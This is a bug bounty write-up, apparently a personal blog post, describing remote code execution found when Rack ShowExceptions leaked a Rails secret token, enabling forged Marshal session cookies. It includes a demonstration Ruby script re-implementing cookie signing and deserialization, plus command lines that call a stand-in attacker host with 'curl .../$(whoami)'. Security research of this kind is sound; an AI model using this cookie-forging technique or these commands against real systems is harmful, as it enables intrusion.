RCE due to ShowExceptions


Hey guys, first of all some good news: I'm starting to blog my findings again. I have a few posts ready, just waiting for confirmation from the companies to make them public.

Getting Started

So a few days back I started testing a private bug bounty program and found a straightforward RCE on it. I chose to start hunting on the main web app, i.e. https://app.redacted.com. While going through it I found an endpoint that downloads a CSV report via redacted.redacted.com (an in-scope asset). The filename and its content were defined in the request itself.

Something happened

I was fuzzing the parameters. When I passed %0d (a URL-encoded carriage return) to file_name, the server threw an exception, and the full exception page was rendered because Rack's ShowExceptions was on.

Rack ShowExceptions was on

It's more than something

As Rack's own documentation for ShowExceptions warns, "Be careful when you use this on public-facing sites as it could reveal information helpful to attackers". It must not be turned on in a production environment: besides the backtrace, the page dumps the request parameters and the entire Rack environment of the failing request.

That Rack environment is the problem. Rails 3.x and 4.0 keep the application's secret token in config/initializers/secret_token.rb (from Rails 4.1 it moved to config/secrets.yml as secret_key_base). The token is the HMAC key used to sign cookies, including the session cookie itself: any signed cookie set by your Rails application is verified against it. At request time Rails exposes the token to its middleware through the Rack env under the key `action_dispatch.secret_token` (Rails 4 adds `action_dispatch.secret_key_base` alongside it), so the exception page leaks, or better said includes, the secret as well. With the secret, an attacker can mint a session cookie that passes signature verification, and because these Rails versions serialize the session with Marshal, the forged payload is deserialized into arbitrary Ruby objects, which is what turns a leaked token into RCE ( https://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/ ). You can read the linked post to understand and know how this works in detail.
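To make the mechanism concrete, here is an added example (written for this post, not code from the original article, from Rails or from the linked write-up) that re-implements the Rails 3.x/4.0 signed-cookie format in a few lines: Base64(Marshal.dump(session)) followed by "--" and a hex HMAC-SHA1 over the Base64 part, then the server-side verify-and-Marshal.load step. The secret value, the `Tracer` class standing in for a deserialization gadget, and the attacker.example hostname are all constructed for the demo; `Tracer` only records that its `marshal_load` hook ran and executes nothing. The JSON variant at the end shows the hardened serializer Rails 4.1+ uses (`cookies_serializer = :json`), where a valid signature still cannot instantiate arbitrary classes.

```ruby
require 'openssl'
require 'json'

# Rails 3.x / 4.0 CookieStore format (ActiveSupport::MessageVerifier with the
# default Marshal serializer), re-implemented for illustration; not Rails' code:
#   cookie = Base64(Marshal.dump(session)) + "--" + hex(HMAC-SHA1(secret, base64_part))
HMAC_ALGO = 'SHA1'.freeze

def hmac(secret, data)
  OpenSSL::HMAC.hexdigest(HMAC_ALGO, secret, data)
end

# Constant-time comparison so the demo verifier does not add a timing leak.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# Signing needs only the secret: whoever holds it can mint a cookie the server
# accepts for any object graph Marshal can encode.
def sign_session(secret, obj)
  data = [Marshal.dump(obj)].pack('m0')
  "#{data}--#{hmac(secret, data)}"
end

# Server side: verify the HMAC, then Marshal.load. Marshal.load reconstructs
# whatever classes the payload names and calls their marshal_load hooks, so a
# forged-but-valid cookie hands the attacker object instantiation inside the app.
def load_session(secret, cookie)
  data, digest = cookie.split('--', 2)
  return nil if data.nil? || digest.nil?
  return nil unless secure_compare(hmac(secret, data), digest)
  Marshal.load(data.unpack1('m0'))
end

# Hardened variant (what Rails 4.1+ does with cookies_serializer = :json):
# same HMAC, but the payload can only decode to hashes, arrays and scalars.
def sign_json_session(secret, hash)
  data = [JSON.generate(hash)].pack('m0')
  "#{data}--#{hmac(secret, data)}"
end

def load_json_session(secret, cookie)
  data, digest = cookie.split('--', 2)
  return nil if data.nil? || digest.nil?
  return nil unless secure_compare(hmac(secret, data), digest)
  JSON.parse(data.unpack1('m0'))
end

# Stand-in for a deserialization gadget (constructed for this example; a real
# chain would reach system()). It only records that its load hook ran.
class Tracer
  @fired = 0
  class << self
    attr_accessor :fired
  end
  attr_reader :cmd

  def initialize(cmd)
    @cmd = cmd
  end

  def marshal_dump
    @cmd
  end

  def marshal_load(cmd)
    @cmd = cmd
    self.class.fired += 1
  end
end

if __FILE__ == $PROGRAM_NAME
  secret = 'secret-leaked-by-ShowExceptions' # constructed value
  legit = sign_session(secret, { 'user_id' => 42 })
  puts "server accepts legit cookie: #{load_session(secret, legit).inspect}"
  forged = sign_session(secret, Tracer.new('curl attacker.example/$(whoami)'))
  obj = load_session(secret, forged)
  puts "forged cookie deserialized to #{obj.class}, hook fired #{Tracer.fired} time(s)"
  puts "rotated secret rejects it: #{load_session('rotated', forged).nil?}"
end
```

The takeaway is that the HMAC does exactly its job; the weakness is that the key was printed on an error page, and that the thing it protects is a Marshal blob. Rotating the secret invalidates every forged cookie, and switching the session serializer to JSON removes the deserialization primitive even if the key leaks again. Neither fixes the root cause, which is `use Rack::ShowExceptions` (or the equivalent Rails debug page) reachable in production.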

I quickly used the code from the linked post to generate a cookie that executes `curl attacker.com/$(whoami)` and got a request to attacker.com/app.

This RCE was applicable to both https://app.redacted.com/ and https://redacted.redacted.com/ because both were served by the same Rails app, and therefore shared the same secret token.

That's all folks :) Shares/retweets are much appreciated. Doubts? DM me at @rootxharsh

Timeline

  • 16 July : Bug found and Reported
  • 16 July : Triaged
  • 18 July : Fixed
  • 20 July : $5000 Rewarded